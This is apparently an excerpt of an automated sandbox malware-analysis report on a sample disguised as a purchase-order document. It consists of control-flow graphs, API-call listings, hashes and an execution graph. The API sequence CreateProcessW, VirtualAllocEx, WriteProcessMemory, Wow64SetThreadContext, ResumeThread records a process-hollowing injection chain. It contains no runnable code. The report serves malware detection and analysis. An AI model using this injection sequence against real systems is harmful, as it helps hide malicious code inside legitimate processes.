                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 55d2560381d2e1d6f4582f905c24591f663ac510c2198df648d562be53ff107b
                • Instruction ID: 558d74d5faeb4b1be5e70b7ce78bdfaad676e1cb697d167f4fad404fe9559bcd
                • Opcode Fuzzy Hash: 55d2560381d2e1d6f4582f905c24591f663ac510c2198df648d562be53ff107b
                • Instruction Fuzzy Hash: C681CF75C0026DDFDB25CFA9D940BEDBBF1AB09300F0094AAE548B7260DB749A85CF94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 66 1745500-174558b 67 17455a2-17455b0 66->67 68 174558d-174559f 66->68 69 17455c7-1745603 67->69 70 17455b2-17455c4 67->70 68->67 71 1745605-1745614 69->71 72 1745617-17456f2 CreateProcessW 69->72 70->69 71->72 76 17456f4-17456fa 72->76 77 17456fb-17457c4 72->77 76->77 86 17457c6-17457ef 77->86 87 17457fa-1745805 77->87 86->87 91 1745806 87->91 91->91
                APIs
                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 017456DF
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 37943e72e4726ab4dcd519cdee017fe40f3884b1ece6e515d710122b8c1ae4e1
                • Instruction ID: a4f181dd111c5ab40d00380f8af348bebeb0f2c30d0379be60a68ec758318da0
                • Opcode Fuzzy Hash: 37943e72e4726ab4dcd519cdee017fe40f3884b1ece6e515d710122b8c1ae4e1
                • Instruction Fuzzy Hash: D181BF75D0026DDFDB25CFA9D980BDDBBF1AB09300F0094AAE548B7260DB749A85CF94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 92 1745b60-1745b65 93 1745b67-1745b71 92->93 94 1745b73-1745bcf 92->94 93->94 95 1745be6-1745c46 WriteProcessMemory 94->95 96 1745bd1-1745be3 94->96 97 1745c4f-1745c8d 95->97 98 1745c48-1745c4e 95->98 96->95 98->97
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01745C36
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 50f9bd02b69713ef4eac27c9886e23a9a2c14c6b1398ff3c6037e29ea32d17bc
                • Instruction ID: 1285e0736cc2cac117e14671ac55b2e0173144f1d486e431c92b8ac8194f0560
                • Opcode Fuzzy Hash: 50f9bd02b69713ef4eac27c9886e23a9a2c14c6b1398ff3c6037e29ea32d17bc
                • Instruction Fuzzy Hash: 5741A9B5D04259DFCB10CFA9D984ADEFBF1AB09310F24906AE814BB250D335AA45CF68

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 101 1745b68-1745bcf 102 1745be6-1745c46 WriteProcessMemory 101->102 103 1745bd1-1745be3 101->103 104 1745c4f-1745c8d 102->104 105 1745c48-1745c4e 102->105 103->102 105->104
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01745C36
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 12c030ac461fc967cea7726517a98fca78dd06bd6ae7adc068b66b4b10eb9aa0
                • Instruction ID: dfc68bfdb35fedece1a1f92bbb046fe2b7f0903467f2dcda12ec9459fbc43904
                • Opcode Fuzzy Hash: 12c030ac461fc967cea7726517a98fca78dd06bd6ae7adc068b66b4b10eb9aa0
                • Instruction Fuzzy Hash: 314168B9D042599FDB10CFA9D984ADEFBF1BB09310F24902AE918B7310D375AA45CF64

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 108 1745941-1745a05 ReadProcessMemory 110 1745a07-1745a0d 108->110 111 1745a0e-1745a4c 108->111 110->111
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017459F5
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: a213e41b820efb770fd02787e2bb04bd92d67161eca7ea03d04341aae952294a
                • Instruction ID: 54132769281446c44a321f6a3fc328cb525178f367dec48f00f8c4d686a251ee
                • Opcode Fuzzy Hash: a213e41b820efb770fd02787e2bb04bd92d67161eca7ea03d04341aae952294a
                • Instruction Fuzzy Hash: 3E4167B9D04259DFCF10CFA9D984ADEFBB1BB19310F10A02AE814B7210D375AA45CF65

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 114 1745948-1745a05 ReadProcessMemory 115 1745a07-1745a0d 114->115 116 1745a0e-1745a4c 114->116 115->116
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017459F5
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: ba0d64776b0d299d17bc562b12d004d0fff7e743d704c2d04eb700430ce6bce0
                • Instruction ID: f66d4d9d630bebf1249145baae57cb9ee6789ea3e924bb2723c73744393be091
                • Opcode Fuzzy Hash: ba0d64776b0d299d17bc562b12d004d0fff7e743d704c2d04eb700430ce6bce0
                • Instruction Fuzzy Hash: B13164B9D042589FCF10CFAAD984ADEFBB5BB09310F10A02AE814B7210D335AA45CF65

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 119 1745a58 120 1745a5f-1745b15 VirtualAllocEx 119->120 121 1745b17-1745b1d 120->121 122 1745b1e-1745b54 120->122 121->122
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01745B05
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: ae3f45bf97bb1127d19216128f8eb42def72fce4b9932a6a00ea7ab165231ee9
                • Instruction ID: 81f294d59134383d23e7060461b015ec3a6044bebc033513e4662bdfcde5e0f7
                • Opcode Fuzzy Hash: ae3f45bf97bb1127d19216128f8eb42def72fce4b9932a6a00ea7ab165231ee9
                • Instruction Fuzzy Hash: 553143B9D04258DFCF10CFA9D984ADEFBB5AB59310F10A02AE814B7310D335A946CF65

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 125 1745a60-1745b15 VirtualAllocEx 126 1745b17-1745b1d 125->126 127 1745b1e-1745b54 125->127 126->127
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01745B05
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 95af72b0ffc5f3875a187e6ac220a22e2a02dc0763b5bcb590c12eb6b1943eaf
                • Instruction ID: 7a01457b7ae3889cf4d5eaaa0d9f0dcfe7d05c54e787dd51efa377a426e652c5
                • Opcode Fuzzy Hash: 95af72b0ffc5f3875a187e6ac220a22e2a02dc0763b5bcb590c12eb6b1943eaf
                • Instruction Fuzzy Hash: F43143B9D04258DFCF10CFA9D984A9EFBB5BB19310F10A02AE918B7310D335A946CF65

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 130 1745831-1745894 132 1745896-17458a8 130->132 133 17458ab-17458f2 Wow64SetThreadContext 130->133 132->133 134 17458f4-17458fa 133->134 135 17458fb-1745933 133->135 134->135
                APIs
                • Wow64SetThreadContext.KERNEL32(?,?), ref: 017458E2
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 61406c736bea0f2de003478ea84859346f1e1134315310829903d038118d2e5b
                • Instruction ID: 1c93668d090832b1a6310e5746dbd99e20802a5ac4601e1bb079fdb626a71e7f
                • Opcode Fuzzy Hash: 61406c736bea0f2de003478ea84859346f1e1134315310829903d038118d2e5b
                • Instruction Fuzzy Hash: 9931AAB5D012589FDB10CFA9D884ADEFBF1BB49310F24902AE418B7310C778AA45CF64

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 138 1745838-1745894 139 1745896-17458a8 138->139 140 17458ab-17458f2 Wow64SetThreadContext 138->140 139->140 141 17458f4-17458fa 140->141 142 17458fb-1745933 140->142 141->142
                APIs
                • Wow64SetThreadContext.KERNEL32(?,?), ref: 017458E2
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 1d88b4686b38551ace2435b794050495102a4cb8308a0de5f0f17204fa273659
                • Instruction ID: 02e37472a11ac0603e30dfc8d023686ab55290b358d49e874dd628e2dbdd296c
                • Opcode Fuzzy Hash: 1d88b4686b38551ace2435b794050495102a4cb8308a0de5f0f17204fa273659
                • Instruction Fuzzy Hash: F73198B5D012589FDB10CFAAD984ADEFBF5BB49310F24802AE418B7350D778AA45CF64

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 145 1745ca1-1745d2e ResumeThread 147 1745d37-1745d65 145->147 148 1745d30-1745d36 145->148 148->147
                APIs
                • ResumeThread.KERNELBASE(?), ref: 01745D1E
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 61fb05eb568312457536adb8bd490af61abaff59d6f96dfc65cb72ba2baf742a
                • Instruction ID: 30dc3149ccaf2cb73ee40ee40128c07a3ce080a3f41c26e1899514ff0fc1ad92
                • Opcode Fuzzy Hash: 61fb05eb568312457536adb8bd490af61abaff59d6f96dfc65cb72ba2baf742a
                • Instruction Fuzzy Hash: 17218AB9D002189FDB10CFA9D584ADEFBF4AF49320F14906AE818B7350D375A946CFA5

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 151 1745ca8-1745d2e ResumeThread 152 1745d37-1745d65 151->152 153 1745d30-1745d36 151->153 153->152
                APIs
                • ResumeThread.KERNELBASE(?), ref: 01745D1E
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: c7d496b0d9308a2e24453a188bbd129dbf8cd80a97b827d0e3f740e0694a57df
                • Instruction ID: 4a000d05c41b7fe3fc0454060ea64891fb57369b17916cf54e87b04d4a55351a
                • Opcode Fuzzy Hash: c7d496b0d9308a2e24453a188bbd129dbf8cd80a97b827d0e3f740e0694a57df
                • Instruction Fuzzy Hash: E62199B8D002189FDB10CFA9D484ADEFBF4EB09320F14906AE818B7310D335A945CFA5
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: afd815a13e25a5b4c721d83af0ecf271e1fd170f22e4d201299f287543c295e9
                • Instruction ID: ad32d2ef98067b2a65195724b8b166196401c9d15659dd960cdaa1d0ace9518a
                • Opcode Fuzzy Hash: afd815a13e25a5b4c721d83af0ecf271e1fd170f22e4d201299f287543c295e9
                • Instruction Fuzzy Hash: 25919D71E052688FDB69CF29C8556D9FBF2AF8A300F14C1EAC14DAB251EB305E858F41
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4920bdf832f7aa983b504e3c4c878cc7eb92ca2e708fbe77379c71d067fff421
                • Instruction ID: aa46262f0d0956e059796942002ecdc72e7f3f90abee9347ccc7f09e7861dd68
                • Opcode Fuzzy Hash: 4920bdf832f7aa983b504e3c4c878cc7eb92ca2e708fbe77379c71d067fff421
                • Instruction Fuzzy Hash: E8510974E052298FCB68CF25C9856DAF7F2BF89300F6085EA810DA7254DB309F858F40
                Memory Dump Source
                • Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 406ce06e54dd0a0ec30c171bb1504b8c362a44d98ef738c812b7873ecd8f3624
                • Instruction ID: d068282319949c716f5600c0a266db6dd22dbc7e15e9444f55935e6990b3528b
                • Opcode Fuzzy Hash: 406ce06e54dd0a0ec30c171bb1504b8c362a44d98ef738c812b7873ecd8f3624
                • Instruction Fuzzy Hash: F8410674E052298FCBA8CF25C9816DAF7F2FF89700F2085EA810DA7250DB309E958F40

                Execution Graph

                Execution Coverage:30.7%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:4.4%
                Total number of Nodes:1846
                Total number of Limit Nodes:92
                execution_graph 9723 40c640 9750 404bee 9723->9750 9726 40c70f 9727 404bee 6 API calls 9728 40c66b 9727->9728 9729 40c708 9728->9729 9731 404bee 6 API calls 9728->9731 9730 402bab 2 API calls 9729->9730 9730->9726 9732 40c683 9731->9732 9733 40c701 9732->9733 9734 404bee 6 API calls 9732->9734 9735 402bab 2 API calls 9733->9735 9738 40c694 9734->9738 9735->9729 9736 40c6f8 9737 402bab 2 API calls 9736->9737 9737->9733 9738->9736 9757 40c522 9738->9757 9740 40c6a9 9741 40c6ef 9740->9741 9743 405872 4 API calls 9740->9743 9742 402bab 2 API calls 9741->9742 9742->9736 9744 40c6c5 9743->9744 9745 405872 4 API calls 9744->9745 9746 40c6d5 9745->9746 9747 405872 4 API calls 9746->9747 9748 40c6e7 9747->9748 9749 402bab 2 API calls 9748->9749 9749->9741 9751 402b7c 2 API calls 9750->9751 9753 404bff 9751->9753 9752 404c3b 9752->9726 9752->9727 9753->9752 9754 4031e5 4 API calls 9753->9754 9755 404c28 9754->9755 9755->9752 9756 402bab 2 API calls 9755->9756 9756->9752 9758 402b7c 2 API calls 9757->9758 9759 40c542 9758->9759 9759->9740 9760 405941 9761 4031e5 4 API calls 9760->9761 9762 405954 9761->9762 8327 409046 8340 413b28 8327->8340 8329 40906d 8331 405b6f 6 API calls 8329->8331 8330 40904e 8330->8329 8332 403fbf 7 API calls 8330->8332 8333 40907c 8331->8333 8332->8329 8334 409092 8333->8334 8344 409408 8333->8344 8336 4090a3 8334->8336 8339 402bab 2 API calls 8334->8339 8338 402bab 2 API calls 8338->8334 8339->8336 8341 413b31 8340->8341 8342 413b38 8340->8342 8343 404056 6 API calls 8341->8343 8342->8330 8343->8342 8345 409413 8344->8345 8346 40908c 8345->8346 8358 409d36 8345->8358 8346->8338 8357 40945c 8464 40a35d 8357->8464 8359 409d43 8358->8359 8360 40a35d 4 API calls 8359->8360 8361 409d55 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409d8b 8362->8363 8364 4031e5 4 API calls 8363->8364 8365 409dd0 8364->8365 8366 405b6f 6 API calls 8365->8366 8367 409423 8365->8367 8370 409df7 8366->8370 8367->8357 8420 4056bf 8367->8420 8368 409e1c 8368->8367 8369 4031e5 4 API calls 8368->8369 8371 409e62 8369->8371 8370->8368 8372 402bab 2 API calls 8370->8372 8373 4031e5 4 API calls 8371->8373 8372->8368 8374 409e82 8373->8374 8375 4031e5 4 API calls 8374->8375 8376 409ea2 8375->8376 8377 4031e5 4 API calls 8376->8377 8378 409ec2 8377->8378 8379 4031e5 4 API calls 8378->8379 8380 409ee2 8379->8380 8381 4031e5 4 API calls 8380->8381 8382 409f02 8381->8382 8383 4031e5 4 API calls 8382->8383 8384 409f22 8383->8384 8385 4031e5 4 API calls 8384->8385 8388 409f42 8385->8388 8386 40a19b 8387 408b2c 4 API calls 8386->8387 8387->8367 8388->8386 8389 409fa3 8388->8389 8389->8367 8390 405b6f 6 API calls 8389->8390 8391 409fbd 8390->8391 8392 40a02c 8391->8392 8393 402bab 2 API calls 8391->8393 8394 4031e5 4 API calls 8392->8394 8419 40a16d 8392->8419 8396 409fd7 8393->8396 8397 40a070 8394->8397 8395 402bab 2 API calls 8395->8367 8398 405b6f 6 API calls 8396->8398 8399 4031e5 4 API calls 8397->8399 8401 409fe5 8398->8401 8400 40a090 8399->8400 8402 4031e5 4 API calls 8400->8402 8401->8392 8403 402bab 2 API calls 8401->8403 8404 40a0b0 8402->8404 8405 409fff 8403->8405 8407 4031e5 4 API calls 8404->8407 8406 405b6f 6 API calls 8405->8406 8408 40a00d 8406->8408 8409 40a0d0 8407->8409 8408->8392 8410 40a021 8408->8410 8412 4031e5 4 API calls 8409->8412 8411 402bab 2 API calls 8410->8411 8411->8367 8413 40a0f0 8412->8413 8414 4031e5 4 API calls 8413->8414 8415 40a110 8414->8415 8416 40a134 8415->8416 8417 4031e5 4 API calls 8415->8417 8416->8419 8474 408b2c 8416->8474 8417->8416 8419->8367 8419->8395 8421 402b7c 2 API calls 8420->8421 8423 4056cd 8421->8423 8422 4056d4 8425 408c4d 8422->8425 8423->8422 8424 402b7c 2 API calls 8423->8424 8424->8422 8426 413ba4 6 API calls 8425->8426 8427 408c5c 8426->8427 8428 408f02 8427->8428 8429 408f3a 8427->8429 8432 40903e 8427->8432 8431 405b6f 6 API calls 8428->8431 8430 405b6f 6 API calls 8429->8430 8446 408f51 8430->8446 8433 408f0c 8431->8433 8448 413aca 8432->8448 8433->8432 8437 408f31 8433->8437 8477 40a1b6 8433->8477 8435 405b6f 6 API calls 8435->8446 8436 402bab 2 API calls 8436->8432 8437->8436 8439 409031 8440 402bab 2 API calls 8439->8440 8440->8437 8441 409022 8442 402bab 2 API calls 8441->8442 8443 409028 8442->8443 8444 402bab 2 API calls 8443->8444 8444->8437 8445 402bab GetProcessHeap HeapFree 8445->8446 8446->8432 8446->8435 8446->8437 8446->8439 8446->8441 8446->8445 8447 40a1b6 14 API calls 8446->8447 8511 4044ee 8446->8511 8447->8446 8449 409451 8448->8449 8450 413ad7 8448->8450 8458 405695 8449->8458 8451 405781 4 API calls 8450->8451 8452 413af0 8451->8452 8453 405781 4 API calls 8452->8453 8454 413afe 8453->8454 8455 405762 4 API calls 8454->8455 8456 413b0e 8455->8456 8456->8449 8457 405781 4 API calls 8456->8457 8457->8449 8459 4056a0 8458->8459 8463 4056b9 8458->8463 8460 402bab 2 API calls 8459->8460 8461 4056b3 8460->8461 8462 402bab 2 API calls 8461->8462 8462->8463 8463->8357 8465 40a368 8464->8465 8466 40a39a 8464->8466 8470 4031e5 4 API calls 8465->8470 8467 40a3af 8466->8467 8468 4031e5 4 API calls 8466->8468 8469 40a3ca 8467->8469 8471 408b2c 4 API calls 8467->8471 8468->8467 8472 408b2c 4 API calls 8469->8472 8473 40a38a 8469->8473 8470->8473 8471->8469 8472->8473 8473->8346 8475 4031e5 4 API calls 8474->8475 8476 408b3e 8475->8476 8476->8419 8478 40a202 8477->8478 8479 40a1c3 8477->8479 8633 405f08 8478->8633 8480 405b6f 6 API calls 8479->8480 8483 40a1d0 8480->8483 8482 40a1fc 8482->8437 8483->8482 8485 40a1f3 8483->8485 8521 40a45b 8483->8521 8488 402bab 2 API calls 8485->8488 8486 402bab 2 API calls 8486->8482 8488->8482 8489 405b6f 6 API calls 8491 40a245 8489->8491 8490 40a25d 8492 405b6f 6 API calls 8490->8492 8491->8490 8493 413a58 13 API calls 8491->8493 8498 40a26b 8492->8498 8495 40a257 8493->8495 8494 40a28b 8496 405b6f 6 API calls 8494->8496 8497 402bab 2 API calls 8495->8497 8499 40a297 8496->8499 8497->8490 8498->8494 8500 40a284 8498->8500 8640 40955b 8498->8640 8504 40a2b0 8499->8504 8508 40a2b7 8499->8508 8647 40968e 8499->8647 8502 402bab 2 API calls 8500->8502 8502->8494 8503 405b6f 6 API calls 8503->8508 8506 402bab 2 API calls 8504->8506 8506->8508 8507 40a333 8507->8486 8508->8503 8508->8507 8509 402bab 2 API calls 8508->8509 8657 4098a7 8508->8657 8509->8508 8512 402b7c 2 API calls 8511->8512 8513 404512 8512->8513 8515 404585 GetLastError 8513->8515 8517 402bab 2 API calls 8513->8517 8519 40457c 8513->8519 8520 402b7c 2 API calls 8513->8520 8912 4044a7 8513->8912 8516 404592 8515->8516 8515->8519 8518 402bab 2 API calls 8516->8518 8517->8513 8518->8519 8519->8446 8520->8513 8666 40642c 8521->8666 8523 40a469 8524 40c4ff 8523->8524 8669 4047e6 8523->8669 8524->8485 8527 4040bb 12 API calls 8528 40bf88 8527->8528 8528->8524 8529 403c90 8 API calls 8528->8529 8530 40bfaa 8529->8530 8531 402b7c 2 API calls 8530->8531 8533 40bfc1 8531->8533 8532 40c4f3 8534 403f9e 5 API calls 8532->8534 8535 40c3aa 8533->8535 8676 40a423 8533->8676 8534->8524 8535->8532 8538 4056bf 2 API calls 8535->8538 8541 40c4e3 8535->8541 8536 402bab 2 API calls 8536->8532 8540 40c3d2 8538->8540 8540->8541 8543 4040bb 12 API calls 8540->8543 8541->8536 8542 405f08 4 API calls 8544 40c005 8542->8544 8545 40c3f3 8543->8545 8546 40c021 8544->8546 8679 40a43f 8544->8679 8548 40c4d1 8545->8548 8736 405a52 8545->8736 8547 4031e5 4 API calls 8546->8547 8550 40c034 8547->8550 8553 413aca 4 API calls 8548->8553 8559 4031e5 4 API calls 8550->8559 8554 40c4dd 8553->8554 8557 405695 2 API calls 8554->8557 8555 40c411 8741 405a87 8555->8741 8556 402bab 2 API calls 8556->8546 8557->8541 8565 40c04d 8559->8565 8560 40c4b3 8561 402bab 2 API calls 8560->8561 8563 40c4cb 8561->8563 8562 405a52 4 API calls 8573 40c423 8562->8573 8564 403f9e 5 API calls 8563->8564 8564->8548 8567 4031e5 4 API calls 8565->8567 8566 405a87 4 API calls 8566->8573 8568 40c085 8567->8568 8570 4031e5 4 API calls 8568->8570 8569 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8569->8573 8571 40c09c 8570->8571 8574 4031e5 4 API calls 8571->8574 8572 402bab 2 API calls 8572->8573 8573->8560 8573->8562 8573->8566 8573->8569 8573->8572 8575 40c0b3 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c0ca 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c0e7 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c100 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c119 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c132 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c14b 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c164 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c17d 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c196 8592->8593 8594 4031e5 4 API calls 8593->8594 8595 40c1af 8594->8595 8596 4031e5 4 API calls 8595->8596 8597 40c1c8 8596->8597 8598 4031e5 4 API calls 8597->8598 8599 40c1de 8598->8599 8600 4031e5 4 API calls 8599->8600 8601 40c1f4 8600->8601 8602 4031e5 4 API calls 8601->8602 8603 40c20d 8602->8603 8604 4031e5 4 API calls 8603->8604 8605 40c226 8604->8605 8606 4031e5 4 API calls 8605->8606 8607 40c23f 8606->8607 8608 4031e5 4 API calls 8607->8608 8609 40c258 8608->8609 8610 4031e5 4 API calls 8609->8610 8611 40c273 8610->8611 8612 4031e5 4 API calls 8611->8612 8613 40c28a 8612->8613 8614 4031e5 4 API calls 8613->8614 8617 40c2d5 8614->8617 8615 40c3a2 8616 402bab 2 API calls 8615->8616 8616->8535 8617->8615 8618 4031e5 4 API calls 8617->8618 8619 40c315 8618->8619 8620 40c38b 8619->8620 8682 404866 8619->8682 8621 403c40 5 API calls 8620->8621 8623 40c397 8621->8623 8625 403c40 5 API calls 8623->8625 8625->8615 8626 40c382 8628 403c40 5 API calls 8626->8628 8628->8620 8630 406c4c 6 API calls 8631 40c355 8630->8631 8631->8626 8706 4126a7 8631->8706 8634 4031e5 4 API calls 8633->8634 8635 405f1d 8634->8635 8636 405f55 8635->8636 8637 402b7c 2 API calls 8635->8637 8636->8482 8636->8489 8636->8490 8636->8507 8638 405f36 8637->8638 8638->8636 8639 4031e5 4 API calls 8638->8639 8639->8636 8641 409673 8640->8641 8646 40956d 8640->8646 8641->8500 8642 408b45 6 API calls 8642->8646 8643 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8643->8646 8644 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8644->8646 8645 402bab GetProcessHeap HeapFree 8645->8646 8646->8641 8646->8642 8646->8643 8646->8644 8646->8645 8648 4040bb 12 API calls 8647->8648 8652 4096a9 8648->8652 8649 40989f 8649->8504 8650 409896 8651 403f9e 5 API calls 8650->8651 8651->8649 8652->8649 8652->8650 8654 408b45 6 API calls 8652->8654 8655 402bab GetProcessHeap HeapFree 8652->8655 8656 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8652->8656 8905 4059d8 8652->8905 8654->8652 8655->8652 8656->8652 8658 4040bb 12 API calls 8657->8658 8664 4098c1 8658->8664 8659 4099fb 8659->8508 8660 4099f3 8661 403f9e 5 API calls 8660->8661 8661->8659 8662 4059d8 4 API calls 8662->8664 8663 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8663->8664 8664->8659 8664->8660 8664->8662 8664->8663 8665 402bab GetProcessHeap HeapFree 8664->8665 8665->8664 8667 4031e5 4 API calls 8666->8667 8668 406441 GetNativeSystemInfo 8667->8668 8668->8523 8670 4031e5 4 API calls 8669->8670 8672 40480a 8670->8672 8671 4031e5 4 API calls 8671->8672 8672->8671 8674 40484f 8672->8674 8675 40485d 8672->8675 8673 403c40 5 API calls 8673->8675 8674->8673 8675->8524 8675->8527 8677 4031e5 4 API calls 8676->8677 8678 40a435 8677->8678 8678->8542 8680 4031e5 4 API calls 8679->8680 8681 40a451 8680->8681 8681->8556 8683 4031e5 4 API calls 8682->8683 8684 40487c 8683->8684 8684->8626 8685 406c4c 8684->8685 8746 4068eb 8685->8746 8687 406e02 8687->8630 8688 406cab 8758 40469b 8688->8758 8689 406c6c 8689->8687 8689->8688 8755 406894 8689->8755 8696 406df1 8697 40469b 4 API calls 8696->8697 8697->8687 8698 406cef 8698->8696 8699 4031e5 4 API calls 8698->8699 8700 406d26 8699->8700 8700->8696 8701 40771e 6 API calls 8700->8701 8705 406d57 8701->8705 8702 406da2 8703 4031e5 4 API calls 8702->8703 8703->8696 8705->8702 8771 4068b0 8705->8771 8707 4126bb 8706->8707 8708 4126d1 8706->8708 8709 412840 8707->8709 8827 40488c 8707->8827 8708->8709 8833 407055 8708->8833 8709->8626 8713 412837 8714 403c40 5 API calls 8713->8714 8714->8709 8717 41281e 8718 4070ff 6 API calls 8717->8718 8718->8713 8719 407055 6 API calls 8720 412742 8719->8720 8720->8717 8721 40719a 6 API calls 8720->8721 8722 41276e 8721->8722 8735 412804 8722->8735 8849 406f4a 8722->8849 8725 41279a 8855 412553 8725->8855 